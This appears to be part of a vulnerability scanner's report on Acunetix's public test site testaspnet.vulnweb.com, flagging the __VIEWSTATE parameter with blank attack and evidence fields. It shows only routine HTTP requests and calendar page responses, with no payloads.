Request Body - size: 1,101 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8397&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAk3Zm6NoIZGRklSpHqIK75o%2BbSXvbHx5gk99pg4k%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK59LzvBwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gV57GtpUrle2BI%2BCZ%2BYPGftoE0v2A%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:49:59 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAk3Zm6NoIZGRklSpHqIK75o+bSXvbHx5gk99pg4k=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK59LzvBwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gV57GtpUrle2BI+CZ+YPGftoE0v2A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:White" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8413&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAALx359NoIZGRkZnVYSkxhHd6OhqcQDx5zL01rsu4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLi%2B5WxCwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXbozSoPiQqb2q5ov1KNLg4t4Fflg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:34 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAALx359NoIZGRkZnVYSkxhHd6OhqcQDx5zL01rsu4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLi+5WxCwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXbozSoPiQqb2q5ov1KNLg4t4Fflg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:White" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1095 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
